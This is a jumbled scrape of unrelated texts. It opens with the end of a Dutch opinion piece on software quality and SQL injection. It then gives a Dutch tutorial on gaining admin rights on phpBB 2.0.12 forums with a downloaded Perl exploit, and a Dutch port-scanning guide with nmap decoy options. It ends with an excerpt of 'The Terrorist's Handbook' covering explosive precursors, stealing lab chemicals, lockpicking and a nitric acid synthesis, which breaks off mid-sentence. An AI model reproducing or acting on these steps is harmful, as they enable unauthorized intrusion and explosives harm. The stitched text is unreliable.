binnenstebuiten moet, weten dat dus niet. De
kosten zullen dan enorm stijgen, de kwaliteit
keldert, de risico's nemen toe---en dat zien
ze niet aankomen. Kortom: amateurs. Wegwezen

Productie van software in verkeerde handen is
heel gevaarlijk. En omdat onze privacygevoelige
gegevens tegenwoordig in allerlei softwaresystemen
huizen, moeten we als burgers geen genoegen
nemen met amateurs. Het recente voorbeeld van
de patientengevens onderstreept dat alleen
maar. Alleen gelicentieerde it-professionals
die software kunnen produceren, managen en
beheren zijn goed genoeg, en de rest: wegwezen.

Chris Verhoef

Spaink, K. (2005). Het medisch geheim gehackt.
de Volkskrant, 3 september 2005.

Verhoef, C. (2005). Nog even en elke dag is
gehackt-dag. de Volkskrant, 10 september 2005.

Prof. dr. Chris Verhoef is hoogleraar
Informatica bij de afdeling Informatica van de
Vrije Universiteit Amsterdam. E-mail: x@cs.vu.nl.

Een SQL injection attack is een techniek om
via het web binnen te komen in computersystemen
met behulp van het principe van communicatie
met de webapplicatie via foutmeldingen. Het
echte probleem is echter niet de hacker maar
een onvoldoende inputvalidatie voor de
webapplicatie en gebrekkige beveiliging tegen
fraude door personeel. Zeer verontrustend is
dat besluitvormers deze problemen bagatelliseren.



phpBB 2.0.12 forums hacken
Deze tutorial is geschreven door U.R

Voorbeeld forum: http://www.illegaaltje.nl/phpBB2/
(waarop je het LEGAAL kan testen)

In deze tutorial gaan we leren hoe we phpBB 2.0.12 forums kunnen hacken , met behulp van exploits die wij downloaden. Ik ga verder niet op het begrip exploiten in of de fouten , ik ga jullie alleen leren hoe wij phpBB 2.0.12 forums kunnen hacken En ik benadruk nog even dat dit illigaal is als dit zonder toestemming wordt gedaan , en ik nergens verantwoordelijk voor ben.Als je dit eenmaal onder de knie hebt hoop ik dat je hier admins mee gaat helpen in plaats van forums te vernielen.

The Exploit
Een exploit is een script die gebruik maakt van fouten in een forum , om zo bepaalde rechten te kunnen krijgen of wachtwoord hashes te kunnen bemachtigen enz..Exploits worden meestal geschreven in C , Perl en in Php , en wij gaan een exploit gebruiken die in perl is geschreven.We moeten dus eerst de exploit bemachtigen dat doen we door op google , in te tiepen : exploit phpBB 2.0.12. Maar ik ga liever naar : www.milw0rm.com , 1 van de grootste exploit site’s die ik ken. Ik ga daar wat zoeken en kom al snel bij http://www.milw0rm.com/id.php?id=889 .Oke dit is dus de exploit script we zien boven aan ‘#!/usr/bin/perl’ daar maak ik uit op dat we te maken hebben met een exploit die in perl is geschreven.
Dus sla deze script op als exploit.pl op de c:\ schijf. (kladblokje > opslaan als > exploit.pl)

Download Perl
Om onze exploit script uit te voeren hebben we dus perl nodig.
Nu gaan we naar www.google.nl en tiepen we in : Download perl en al snel komen we op een page en daar downloaden we perl.
Voor de luie mensen onderons hier een link :
http://www.activestate.com/Products/Download/Download.plex?id=ActivePerl Nu we perl hebben gedownload en geinstalt kunnen we verder naar het echt hacken van een forum.

Hacken van de phpBB 2.0.12 forum.
Hier is ons voorbeeld forum waarop je het kan testen:
In mijn voorbeeld gebruik ik dit forum ook.

Oke we gaan ons eerst registeren, let er op dat je naam maar uit 1 deel mag bestaan dus niet ‘jan piet’ maar ‘janpiet’.Ik neem in mijn voorbeeld de naam ‘UR’ lekker orgineel.
Nu we een acount hebben gaan we over tot het hacken , open dos ( start > uivoeren/run > tiep command en dan enter).We hebben onze exploit met de naam exploit.pl opgeslagen op de c:\ schijf dus we tiepen nu het volgende in dos : ‘cd c:\’ (zonder aanhalingstekentjes natuurlijk) en druk enter.
En dan typen we ‘exploit.pl ‘ en drukken weer enter en krijgen we dit. (krijg je dit niet heb je perl niet goed geinstalt of iets anders)

Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl www.site.com /forum/ BigAdmin

oke hier wordt uitgelegd hoe we het gebruiken dus we moeten , eerst de site
dan de map waar het forum zich bevind en dan onze acount naam in dit geval UR
Oke nu ga je dat doen met jou forum , in mijn voorbeeld is dat http://www.illegaaltje.nl/phpBB2/index.php .
in mijn voorbeeld tiep ik in dos ‘exploit.pl www.illegaaltje.nl /phpBB2/ UR’
En ik druk enter. ( zoals je ziet vervang ik http:// voor www anders geeft die een error en index.php laat ik weg )
Nu krijg zoiets als hieronder :

Trying to connect to www.illegaaltje.nl/phpBB2/
Forum is vulnerable!!!
Trying to get the user: UR ID...
Done... ID=15
Trying to give user:UR admin status...
Well done!!! UR should now have an admin status..

Nu ga je naar het forum toe en log je in op je acount , en zie je dat er iets (onderaan het forum) in de richting van ‘adminstratie paneel’ staat.
En dat is het bewijs dat je admin bent, wat je voor het rest gaat doen is helemaal jou keuze ga ik je niet mee helpen.
Ik zou de admin vertellen dat zijn forum niet veilig is en samen voor een oplossing zoeken.

Ik hoop dat jullie hier iets van hebben geleerd , en nu forum admins gaan helpen met deze fout te zoeken en te verbeteren.Ben nergens aansprakelijk voor , dus alles is geheel op eigen risico


Let op: Als je niet ingelogd bent kan je maar 10% zien van alle tutorials zien!!

[ Poortscannen ]
Poortscannen is het proces waarbij verbinding wordy gemaakt met TCP- en UDP-poorten op het doelsysteem om vast te stellen welke services
er actief zijn en in een luistertoestand staan, of beter bekend als 'listening'. Actieve services die luisteren, kunnen een onbevoegde gebruiker toelaten tot systemen doe onjuist geconfigureerd zijn of een softwareversie hebben met bekende zwakke plekken op het gebied van beveiliging. Poostscanning-tools en technieken hebben de laatste paar jaren een snelle ontwikkeling doorgemaakt. We beperken ons tot een aantal populaire hulpmiddelen en technieken die ons een heleboel informatie zullen (kunnen?) opleveren.
Er zijn een aantal doelstellingen die we willen bereiken als we gaan poortscannen op een doelsysteem. De belangrijkste zijn de volgende:
* Identificeren van zowel de TCP- als UDP-services die op het doelsysteem worden uitgevoerd;
* Identificeren van het type besturingssysteem van het doelsysteem;
* Identificeren van specifieke toepassingen of versies van een bepaalde service;
Als we deze doelen hebben bereikt kunnen we zeggen dat onze poortscan succesvol is gelukt!
Voordat we ons verdiepen in de benodigde hulpmiddelen voor poortscanning, moeten we de verschillende poortscanningtechnieken bespreken. Een van de pioniers in het gebruik van verschillende poortscantechnieken is Fyodor. Hij heeft een tal van scaningtechnieken opgenomen in zijn programma NMAP. Veel scantypen die we bespreken, zijn door Fyodor zelf uitgewerkt!
Dit type scan maakt een verbinding met de doelpoort en voert een volledig drievoudige handshake uit (SYN, SYN/ACK en ACK). Het kan gemakkelijk door het doelsysteem ontdekt worden.
Deze techniek word half-open scanning genoemd omdat geen volledige TCP-verbinding wordt gemaakt. In plaats daarvan wordt een SYN-pakket naar de doelpoort verstuurd. Als een SYN/ACK van de doelpoort ontvangen word, kunnen we concluderen dat de poort in de listening-status staat. Als een RST/ACK wordt ontvangen, geef dit gewoonlijk aan dat de poort niet luistert. Een RST/ACK wordt verzonden door het systeem dat de poortscan uitvoert zodat nooit een volledige verbinding tot stand komt. Deze techniek heeft het voordeel minder snel opgemerkt te worden dan een volledige TCP-verbinding en wordt mogelijk niet door het doelsysteem geregistreerd.
Bij deze techniek wordt een FIN-pakket naar de doelpoort gestuurd. Volgens RFC 0793 (zie www.ietf.org/rfc/) moet het doelsysteem voor alle gesloten poorten een RST terugsturen. Deze techniek werkt gewoonlijk alleen op TCP/IP-stacks onder UNIX.
Bij deze techniek word een FIN-, URG- en PUSH-pakket naar de doelpoort gestuurd. Volgens RFC 0793 moet het doelsysteem voor alle gesloten poorten een RST terugsturen.
Bij deze techniek worden alle blaggen uitgezet. Volgens RFC 0793 moet het doelsysteem voor alle gesloten poorten een RST terugsturen.
Bij deze techniek kunnen op sommige systemen (bv AIX en FreeBSD) zowel open als gefilterde/niet-gefilterde poorten ontdekt worden aan de hand van een afwijkende wijze waarop de TCP-venstergrootte wordt aangeduid.
Deze techniek wordt gebruikt om firewall-regelsets te analyseren. De scan kan van nut zijn bij het bepalen of de firewall een eenvoudig pakketfilter is dat alleen tot stand gekomen verbindingen (verbindingen met de ACK-bit ingesteld) toelaat of een firewall die pakketten voorfiltert.
Deze techniek is specifiek voor *NIX-systemen en wordt gebruikt om RPC-poorten (Remote Procedure Call) en hun bijhorende programma en versienummer te ontdekken en identificeren.
Deze techniek stuurt een UDP-pakket naar de doelpoort. Als de doelpoort antwoordt met het bericht 'ICMP Port Unreachable', wordt de doelpoort gesloten. andersom geldt dat we kunnen concluderen dat de poort open is als we geen 'ICMP Port Unreachable' ontvangen. Aangezien UDP bekend staat als een verbindingsloos protocol, is de nauwkeurigheid van deze techniek sterk afhankelijk van veel factoren met betrekking tot het gebruik van netwerk- en systeemelementen. Bovendien is UDP-scanning een heel langzaam proces als u een mechanisle probeert te scannen dat intensieve pakketfiltering toepast. Als u van plan bent UDP-scans over Internet te doen, bedenk dan dat de resultaten niet altijd betrouwbaar zullen zijn!
We beginnen met STROBE. Dit is een respectable poortscanningprogramma dat geschreven is door Julian Assange (ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/strobe-1.06.tgz). Het is al enige tijd in omloop en het is een van de snelste en betrouwbaarste TCP-scanners. Een aantal belangrijke kenmerken van STROBE zijn het vermogen systeem- en netwerkelementen te optimaliseren en het doelsysteem efficïent te scannen. Daarnaast kunnen versie 1.04 en hoger van STROBE de bijhorende banner (indien beschikbaar) bemachtigen van iedere poort waarmee zij in verbinding komen. Met behulp hiervan kunnen zowel het besturingssysteem als de actieve service mogelijk geïdentificeerd worden. De STROBE-uitvoer geeft elke luisterende TCP-poort weer:
bash-2.05a$ strobe
Strobe 1.06 @ 1995 Julian Assange (proff@suburbia.net) echo ------- 7/tcp Echo [95,JBP] ftp -------- 21/tcp File Transfer exec ------- 512/tcp Remote Process Execution ssh -------- 22/tcp Secure Shell telnet ----- 23/tcp Telnet [112,JBP] lockd ------ 4045/tcp unknown ---- 32799/tcp unassigned
Strobe is zeer betrouwbaar, maar heeft wel wat beperkingen. Strobe is alleen een TCP-scanner en biedt geen mogelijkheden voor UDP-scanning. Bovendien gebruikt STROBE alleen de techniek van de TCP-verbindingsscan als met elke poort verbinding wordt gemaakt. Dit gedrag draagt weliswaar bij aan de betrouwbaarheid van STROBE, maar zorgt er ook voor dat de poortscans gemakkelijk door het doelsysteem te ontdekken zijn! Als de scanningstechnieken van STROBE niet toereikend zijn, zijn er nog andere technieken waarvoor ik dieper in mijn gereedschapkist moet gaan duiken :D
Aangezien STROBE uitsluitend geschikt is voor TCP-scanning, gebruiken we UDP_SCAN voor het scannen van UDP-services. Kijk eens op http://wwwdsilx.wwdsi.com voor de laatste versie! Er zijn nog veel ander eprogramma's die UDP-scans uitvoeren, maar ik heb ervaren dat UDP_SCAN een van de betrouwbaarste is. Even een toepassing:
bash-2.05a$ udp_scan 1-1024
Een ander uitstekend programma is NETCAT ofwel NC, dat geschreven is door Hobbit (hobbit@avian.org). Dit programma kan enorm veel taken uitvoeren. De opties -v en -vv leveren respectievelijk uitvoerige en zeer uitvoerige outputs op. De optie -z geeft nulmodus-I/O en wordt gebruikt voor poortscanning. De optie -w2 geeft een time-out-waarde voor elke verbinding. Standaard gebruikt NC TCP-poorten. Voor het scannen van UDP-poorten moeten we de optie -u gebruiken. Zie ook het volgende voorbeeld:
bash-2.05a$ nc -v -z -w2 1-140
[] 139 (?) open
[] 135 (?) open
[] 110 (pop-3) open
[] 80 (http) open
[] 53 (domain) open
[] 21 (ftp) open
bash-2.05a$ nc -u -v -z -w2 1-140
[] 135 (ntportmap) open
[] 123 (ntp) open
[] 53 (domain) open
[] 42 (name) open
Nu we een aantal hulpmiddelen voor poortscanning hebben besproken hebben, komen we nu aan de Nr. 1 op dit gebied: NMAP (http://www.insecure.org/nmap/)! NMAP, geschreven door Fyodor, biedt TCP- en UDP-scanning mogelijkheden en bevat ook de eerder genoemde scanningstechnieken. Er zijn weinig hulpmiddelen die zoveel bruikbaarheid in één pakket hebben. We bekijken nu een paar van de handigste opties.
bash-2.05a$ nmap --help
Output: Een hele waslijst met help!
bash-2.05a$ nmap -sS
Output: TCP-scan
NMAP heeft nog meer mogelijkheden die de moeite waard zijn. We hebben se syntaxis gezien die gebruikt kan worden om één systeem te scannan. Met NMAP is het echter eenvoudig om een compleet netwerk te scannen. De optie -oN slaat de resultaten op in een voor mensen leesbare indeling:
bash-2.05a$ nmap -sF -oN outputfile
Afhankelijk van hoe complex het doelnetwerk en de hosts zijn, konden de scans die tot nu toe zijn uitgevoerd eenvoudig ontdekt worden. NMAP biedt via de optie -D extra lokmiddelen (decoys) die ontworpen zijn om een doelsite te overspoelen met overbodige informatie. Het principe van deze optie is dat gelijktijdig met een echte scan decoy-scans worden verstuurd. Dit wordt gedaan door het brondadres van echte servers te vervalsen en deze valse scans met de echte poortscan te mengen. Het doelsysteem zal dan zowel aan de valse adressen als aan jouw werkelijke poortscan antwoorden. Bovendien zit het doel met het probleem om alle scans te moeten opsporen om vast te stellen welke echt zijn en welke niet. Denk eraan dat het decoy-adres actief moet zijn, anders kunnen uw scans op het doelsysteem een vloedgolf aan SYN-pakketten veroorzaken met een DoS (Denail-of-Service) als gevolg! Een voorbeeldje:
bash-2.05a$ nmap -sS -D
Output: Het resultaat...
Nog een handige scanoptie is ident (zie ook RFC 1413). Ident wordt gebruikt om de identiteit van een gebruiker van een bepaalde TCP-verbinding vast te stellen door te communiceren met poort 113. Dit werkt het beste onder een UNIX systeem:
bash-2.05a$ nmap -I
Output: Poortscan met ident
Je ziet aan de hand van dit voorbeeld dat we de eigenaar van elk proces kunnen vinden. Slimme lezertjes hebben misschien opgemerkt dat de webserver als (meestal toch) 'root' draait in plaats van een onbevoegde gebruiker zoals 'nobody', wat in dat laatste geval een kenmerk is van gebrekkige beveiliging.
Ik heb zowat de belangrijkste en nuttigste dingen hierboven besproken voor de *NIX systemen maar er zijn ook mensen die nog zijn aan het prullen met Windows...
Poortscannen onder Windows
Tot nu toe heb ik dus enkel de aandacht besteed aan onze UNIX-gebruikers. In dit deel van de tekst gaan we ook de Windows-gebruikers wat verder helpen met enkele bruikbare tools!
Een van de meest veelzijdige hulpmiddelen voor netwerkverkenning is NetScan Tools Pro 2000 ofwel NSTP2K. Dit toepassingsprogramma is zéér uitgebreid, een aanrader maar deze gaan we voorlopig niet bespreken.
Dan hebben we SuperScan, van Robin Keir (http://membsers.home.com/rkeir/software.html). Deze is eveneens een snelle en flexibele TCP-poortscanner (en gratis). Evenals NSTP2K maakt het ook flexibele specificatie van doel-IP's en poortlijsten mogelijk. Gemakkelijker dan SuperScan kan niet. Nogtans geeft het programma een aantal van de meest uitgebreide poortlijsten die ik ooit gezien heb.
NTOScanner van NTObjectives Inc. (http://www.ntobjectives.com/) is een snelle grafische TCP-poortscanner! Het programma is echter niet zo flexibel in het specificeren van de doelen en poorten, en vereist bovendien dat hosts eerst gepinged worden bij het scannen van klasse-C-netwerken. Niet echt een aanrader dus...
De Windows UDP Port Scanner (WUPS - http://www.ntsecurity.nu/toolbox/wups/) is betrouwbaar, grafisch en behoorlijk actieve UDP-poortscanner. Het is een zeer goed hulpmiddel voor je UDP-scans...

Let op: Als je niet ingelogd bent kan je maar 10% zien van alle tutorials zien!!
The Terrorist's Handbook

Gunzenbomz Pyro-Technologies, a division of Chaos Industries (CHAOS), is
proud to present this first edition of The Terrorist's Handbook. First and
foremost, let it be stated that Chaos Industries assumes no responsibilities
for any misuse of the information presented in this publication. The purpose
of this is to show the many techniques and methods used by those people in this
and other countries who employ terror as a means to political and social goals.
The techniques herein can be obtained from public l
ibraries, and can usually be
carried out by a terrorist with minimal equipment. This makes one all the more
frightened, since any lunatic or social deviant could obtain this information,
and use it against anyone. The processes and techniques herein SHOULD NOT BE
Gunzenbomz Pyro-Technologies feels that it is important that everyone has some
idea of just how easy it is for a terrorist to perform acts of terror; that is
the reason for the existence of this publication.

1.1 Table of Contents
2.01 ........ Black Powder
2.02 ........ Pyrodex
2.03 ........ Rocket Engine Powder
2.04 ........ Rifle/Shotgun Powder
2.05 ........ Flash Powder
2.06 ........ Ammonium Nitrate
.11 ........ Techniques for Picking Locks
2.31 ........ Nitric Acid
2.32 ........ Sulfuric Acid
2.33 ........ Ammonium Nitrate
3.01 ........ Explosive Theory
3.11 ........ Ammonium Triiodide Crystals
3.12 ........ Mercury Fulminate
3.13 ........ Nitroglycerine
3.14 ........ Picrates
3.21 ........ Black Powder
3.22 ........ Nitrocellulose
3.23 ........ Fuel + Oxodizer mixtures
3.24 ........ Perchlorates
3.31 ........ R.D.X. (Cyclonite)
3.32 ........ Ammonium Nitrate
3.33 ........ ANFOS
3.34 ........ T.N.T.
3.35 ........ Potassium Chlorate
3.36 ........ Dynamite
3.37 ........ Nitrostarch Explosives
3.38 ........ Picric Acid
3.39 ........ Ammonium Picrate (Explosive D)
3.40 ........ Nitrogen Trichloride
3.41 ........ Lead Azide
3.5 ....... OTHER "EXPLOSIVES"
3.51 ........ Thermit
3.52 ........ Molotov co*cktails
3.53 ........ Chemical Fire Bottle
3.54 ........ Bottled Gas Explosives
4.1 ....... SAFETY
4.21 ........ Fuse Ignition
4.22 ........ Impact Ignition
4.23 ........ Electrical Ignition
4.24 ........ Electro - Mechanical Ignition
4.241 ....... Mercury Switches
4.242 ....... Tripwire Switches
4.243 ....... Radio Control Detonators
4.3 ....... DELAYS
4.31 ........ Fuse Delays
4.32 ........ Timer Delays
4.33 ........ Chemical Delays
4.41 ........ Paper Containers
4.42 ........ Metal Containers
4.43 ........ Glass Containers
4.44 ........ Plastic Containers
4.51 ........ Shaped Charges
4.52 ........ Tube Explosives
4.53 ........ Atomized Particle Explosions
4.54 ........ Lightbulb Bombs
4.55 ........ Book Bombs
4.56 ........ Phone Bombs
5.1 ..
5.11 ........ Bow and Crossbow Ammunition
5.12 ........ Blowgun Ammunition
5.13 ........ Wrist Rocket and Slingshot Ammunition
5.21 ........ Handgun Ammunition
5.22 ........ Shotguns
5.31 ........ .177 Caliber B.B Gun Ammunition
5.32 ........ .22 Caliber Pellet Gun Ammunition
6.1 ....... ROCKETS
6.11 ........ Basic Rocket-Bomb
6.12 ........ Long Range Rocket-Bomb
6.13 ........ Multiple Warhead Rocket-Bombs
6.2 ........ CANNONS
6.21 ........ Basic Pipe Cannon
6.22 ........ Rocket-Firing Cannon
7.1 ......... Smoke Bombs
7.2 ......... Colored Flames
7.3 ......... Tear Gas
7.4 ......... Fireworks
7.41 ........ Firecrackers
7.42 ........ Skyrockets
7.43 ........ Roman Candles
11.0 ...... ABOUT THE AUTHOR

Almost any city or town of reasonable size has a gun store and
a pharmacy. These are two of the places that potential terrorists visit in
order to purchase explosive material. All that one has to do is know something
about the non-explosive uses of the materials. Black powder, for example,
is used in blackpowder firearms. It comes in varying "grades", with each
different grade being a slightly different size. The grade of black powder
depends on what the calibre of the gun that it is used in; a fine grade of
powder could burn too fast in the wrong caliber weapon. The rule is:
the smaller the grade, the faster the burn rate of the powder.


Black powder is generally available in three grades. As stated before,
the smaller the grade, the faster the powder burns. Burn rate is extremely
important in bombs. Since an explosion is a rapid increase of gas volume in
a confined envir
onment, to make an explosion, a quick-burning powder is
desirable. The three common grades of black powder are listed below, along
with the usual bore width (calibre) of what they are used in. Generally,
the fastest burning powder, the FFF grade is desirable. However, the other
grades and uses are listed below:

F .50 or greater model cannon; some rifles
FF .36 - .50 large pistols; small rifles
FFF .36 or smaller pistols; derringers

The FFF grade is the fastest burning, because the smaller grade has
more surface area or burning surface exposed to the flame front. The larger
grades also have uses which will be discussed later. The price range of
black powder, per pound, is about $8.50 - $9.00. The price is not affected
by the grade, and so one saves oneself time and work if
one buys the finer
grade of powder. The major problems with black powder are that it can be
ignited accidentally by static electricity, and that it has a tendency to
absorb moisture from the air. To safely crush it, a bomber would use a plastic
spoon and a wooden salad bowl. Taking a small pile at a time, he or she would
apply pressure to the powder through the spoon and rub it in a series of strokes
or circles, but not too hard. It is fine enough to use when it is about as fine
as flour. The fineness, however, is dependant on what type of device one wishes
to make; obviously, it would be impracticle to crush enough powder to fill a 1
foot by 4 inch radius pipe. Anyone can purchase black powder, since anyone can
own black powder firearms in America.


Pyrodex is a synthetic powder that is used like black powder. It comes
in the same grades, but it is more expensive per pound. However, a one pound
container of pyrodex contains more material by volume than a pound
of black
powder. It is much easier to crush to a very fine powder than black powder, and
it is considerably safer and more reliable. This is because it will
not be set off by static electricity, as black can be, and it is less inclined
to absorb moisture. It costs about $10.00 per pound. It can be crushed in the
same manner as black powder, or it can be dissolved in boiling water and dried.

One of the most exciting hobbies nowadays is model rocketry. Estes is
the largest producer of model rocket kits and engines. Rocket engines are
composed of a single large grain of propellant. This grain is surrounded by
a fairly heavy cardboard tubing. One gets the propellant by slitting the tube
lengthwise, and unwrapping it like a paper towel roll. When this is done, the
grey fire clay at either end of the propellant grain must be removed. This is
usually done gently with a plastic or brass knife. The material is exceptionally
hard, and must be crushed to be used. By gr
ipping the grain on the widest
setting on a set of pliers, and putting the grain and powder in a plastic bag,
the powder will not break apart and shatter all over. This should be done to
all the large chunks of powder, and then it should be crushed like black powder.
Rocket engines come in various sizes, ranging from 1/4 A - 2T to the incredibly
powerful D engines. The larger the engine, the more expensive. D engines come
in packages of three, and cost about $5.00 per package. Rocket engines are
perhaps the single most useful item sold in stores to a terrorist, since they
can be used as is, or can be cannibalized for their explosive powder.

Rifle powder and shotgun powder are really the same from a practicle
standpoint. They are both nitrocellulose based propellants. They will be
referred to as gunpowder in all future references. Gunpowder is made by the
action of concentrated nitric and sulfuric acid upon cotton. This material is
then dissolved by solvents and then
reformed in the desired grain size. When
dealing with gunpowder, the grain size is not nearly as important as that of
black powder. Both large and small grained gunpowder burn fairly slowly
compared to black powder when unconfined, but when it is confined, gunpowder
burns both hotter and with more gaseous expansion, producing more pressure.
Therefore, the grinding process that is often necessary for other propellants
is not necessary for gunpowder. Gunpowder costs about $9.00 per pound. Any
idiot can buy it, since there are no restrictions on rifles or shotguns in the


Flash powder is a mixture of powdered zirconium metal and various
oxidizers. It is extremely sensitive to heat or sparks, and should be treated
with more care than black powder, with which it should NEVER be mixed. It is
sold in small containers which must be mixed and shaken before use. It is very
finely powdered, and is available in three speeds: fast, medium, and slow. The
fast flash powder is the bes
t for using in explosives or detonators.

It burns very rapidly, regardless of confinement or packing, with a hot
white "flash", hence its name. It is fairly expensive, costing about $11.00.
It is sold in magic shops and theatre supply stores.


Ammonium nitrate is a high explosive material that is often used as
a commercial "safety explosive" It is very stable, and is difficult to ignite
with a match. It will only light if the glowing, red-hot part of a match is
touching it. It is also difficult to detonate; (the phenomenon of detonation
will be explained later) it requires a large shockwave to cause it to go high
explosive. Commercially, it is sometimes mixed with a small amount of
nitroglycerine to increase its sensitivity. Ammonium nitrate is used in the
"Cold-Paks" or "Instant Cold", available in most drug stores. The "Cold Paks"
consist of a bag of water, surrounded by a second plastic bag containing the
ammonium nitrate. To get the ammonium nitrate, simply
cut off the top of the
outside bag, remove the plastic bag of water, and save the ammonium nitrate in
a well sealed, airtight container, since it is rather hydroscopic, i.e. it
tends to absorb water from the air. It is also the main ingredient in many


The first section deals with getting chemicals legally. This section
deals with "procuring" them. The best place to steal chemicals is a college.
Many state schools have all of their chemicals out on the shelves in the
labs, and more in their chemical stockrooms. Evening is the best time to enter
lab buildings, as there are the least number of people in the buildings, and
most of the labs will still be unlocked. One simply takes a bookbag, wears
a dress shirt and jeans, and tries to resemble a college freshman. If anyone
asks what such a person is doing, the thief can simply say that he is looking
for the polymer chemistry lab, or some other chemistry-related department
other than the one they are in. One can us
ually find out where the various
labs and departments in a building are by calling the university. There
are, of course other techniques for getting into labs after hours, such as
placing a piece of cardboard in the latch of an unused door, such as a back
exit. Then, all one needs to do is come back at a later hour. Also, before
this is done, terrorists check for security systems. If one just walks into a
lab, even if there is someone there, and walks out the back exit, and slip the
cardboard in the latch before the door closes, the person in the lab will never
know what happened. It is also a good idea to observe the building that one
plans to rob at the time that one plans to rob it several days before the
actual theft is done. This is advisable since the would-be thief should know
when and if the campus security makes patrols through buildings. Of course, if
none of these methods are successful, there is always section 2.11, but as a
rule, college campus security is pretty poor, and nobody suspects anothe
person in the building of doing anything wrong, even if they are there at an
odd hour.


If it becomes necessary to pick a lock to enter a lab, the world's
most effective lockpick is dynamite, followed by a sledgehammer. There are
unfortunately, problems with noise and excess structural damage with these
methods. The next best thing, however, is a set of army issue lockpicks.

These, unfortunately, are difficult to acquire. If the door to a lab is locked,
but the deadbolt is not engaged, then there are other possibilities. The rule
here is: if one can see the latch, one can open the door. There are several
devices which facilitate freeing the latch from its hole in the wall. Dental
tools, stiff wire ( 20 gauge ), specially bent aluminum from cans, thin pocket-
knives, and credit cards are the tools of the trade. The way that all these
tools and devices are uses is similar: pull, push, or otherwise move the latch
out of its hole in the wall, and pull the doo
r open. This is done by sliding
whatever tool that you are using behind the latch, and pulling the latch out
from the wall. To make an aluminum-can lockpick, terrorists can use an aluminum
can and carefully cut off the can top and bottom. Cut off the cans' ragged
ends. Then, cut the open-ended cylinder so that it can be flattened out into a
single long rectangle. This should then be cut into inch wide strips. Fold the
strips in 1/4 inch increments (1). One will have a long quadruple-thick 1/4
inch wide strip of aluminum. This should be folded into an L-shape, a J-shape,
or a U-shape. This is done by folding. The pieces would look like this:

_________________________________________________________ v
1/4 |_______________________________________________________| |
1/4 |_______________________________________________________| | 1 inch
1/4 |_______________________________________________________| |
1/4 |_______________________________________________________| |
Fold along lines to make a single quadruple-thick piece of
aluminum. This should then be folded to produce an L,J,or U shaped
device that looks like this:
/ ________________________________________|
| |
| | L-shaped
| |
| |
/ ___________________________|
| |
| | J-shaped
| |
| |________
/ ___________________|
| |
| |
| | U-shaped
| |
| |____________________

All of these devices should be used to hook the latch of a door and
pull the latch out of its hole. The folds in the lockpicks will be between
the door and the wall, and so the device will not unfold, if it is made

Anyone can get many chemicals from hardware stores, supermarkets,
and drug stores to get the materials to make explosives or other dangerous
compounds. A would-be terrorist would merely need a station wagon and some
money to acquire many of the chemicals named here.

Chemical Used In Available at
________ _______ ____________
alcohol, ethyl * alcoholic beverages liquor stores
solvents (95% min. for both) hardware stores
ammonia + CLEAR household ammonia supermarkets/7-eleven
ammonium instant-cold paks, drug stores,
nitrate fertilizers medical supply stores
nitrous oxide pressurizing whip cream party supply stores
magnesium firestarters surplus/camping stores
lecithin vitamins pharmacies/drug stores
mineral oil cooking, laxative supermarket/drug stores
@ mercury thermometers supermarkets/hardware stores
sulfuric acid uncharged car batteries automotive stores
glycerine ? pharmacies/drug stores
sulfur gardening gardening/hardware store
charcoal charcoal grills supermarkets/gardening stores
sodium nitrate fertilizer gardening store
cellulose (cotton) first aid drug/medical supply stores
strontium nitrate road flares surplus/auto stores,
fuel oil kerosene stoves surplus/camping stores,
bottled gas propane stoves surplus/camping stores,
potassium permanganate water purification purification plants
hexamine or hexamine stoves surplus/camping stores
methenamine (camping)
nitric acid ^ cleaning printing printing shops
plates photography stores
iodine & first aid drug stores
sodium perchlorate solidox pellets hardware stores
for cutting torches

notes: * ethyl alcohol is mixed with methyl alcohol when it is used as a
solvent. Methyl alcohol is very poisonous. Solvent alcohol must be
at least 95% ethyl alcohol if it is used to make mercury fulminate.
Methyl alcohol may prevent mercury fulminate from forming.

+ Ammonia, when bought in stores comes in a variety of forms. The
pine and cloudy ammonias should not be bought; only the clear
ammonia should be used to make ammonium triiodide crystals.

@ Mercury thermometers are becoming a rarity, unfortunately. They
may be hard to find in most stores. Mercury is also used in
switches, which are available at electronics stores. Mercury is a
hazardous substance, and should be kept in the thermometer or
mercury switch until used. It gives off mercury vapors which will
cause brain damage if inhaled. For this reason, it is a good idea
not to spill mercury, and to always use it outdoors. Also, do not
get it in an open cut; rubber gloves will help prevent this.

^ Nitric acid is very difficult to find nowadays. It is usually
stolen by bomb makers, or made by the process described in a later
section. A desired concentration for making explosives about 70%.

& The iodine sold in drug stores is usually not the pure crystaline
form that is desired for producing ammonium triiodide crystals.
To obtain the pure form, it must usually be acquired by a doctor's
prescription, but this can be expensive. Once again, theft is the
means that terrorists result to.


There are several ways to make this most essential of all acids for
explosives. One method by which it could be made will be presented. Once
again, be reminded that these methods SHOULD NOT BE CARRIED OUT!!
Materials: Equipment:
sodium nitrate or adjustable heat source
potassium nitrate
distilled water
ice bath
sulfuric acid stirring rod
collecting flask with stopper

1) Pour 32 milliliters of concentrated sulfuric acid into the retort.
2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of potassium
nitrate. and add this to the acid slowly. If it all does not dissolve,
carefully stir the solution with a glass rod until it does.

3) Place the op
en end of the retort into the collecting flask, and place the
collecting flask in the ice bath.
4) Begin heating the retort, using low heat. Continue heating until liquid
begins to come out of the end of the retort. The liquid that forms is nitric
acid. Heat until the precipitate in the bottom of the retort is almost dry,
or until no more nitric acid is forming. CAUTION: If the acid is headed too
strongly, the nitric acid will decompose as soon as it is formed. This
can result in the production of highly flammable and toxic gasses that may
explode. It is a good idea to set the above apparatus up, and then get
away from it.

Potassium nitrate could also be obtained from store-bought black powder,
simply by dissolving black powder in boiling water and filtering out
the sulfur and charcoal. To obtain 68 g of potassium nitrate, it would be
necessary to dissolve about 90 g of black powder in about one litre of
boiling water. Filter the dissolved solution through filter paper in
a funnel
into a jar until the liquid that pours through is clear. The charcoal and
sulfur in black powder are insoluble in water, and so when the solution of
water is allowed to evaporate, potassium nitrate will be left in the jar.

Sulfuric acid is far too difficult to make outside of a laboratory or
industrial plant. However, it is readily available in an uncharged car battery.
A person wishing to make sulfuric acid would simply remove the top of a car
battery and pour the acid into a glass container. There would probably be
pieces of lead from the battery in the acid which would have to be removed,
either by boiling or filtration. The concentration of the sulfuric acid can
also be increased by boiling it; very pure sulfuric acid pours slightly faster
than clean motor oil.

Ammonium nitrate is a very powerful but insensitive high-order
explosive. It could be made very easily by pouring nitric acid into a large
flask in an ice bath. Then, by
simply pouring household ammonia into the flask
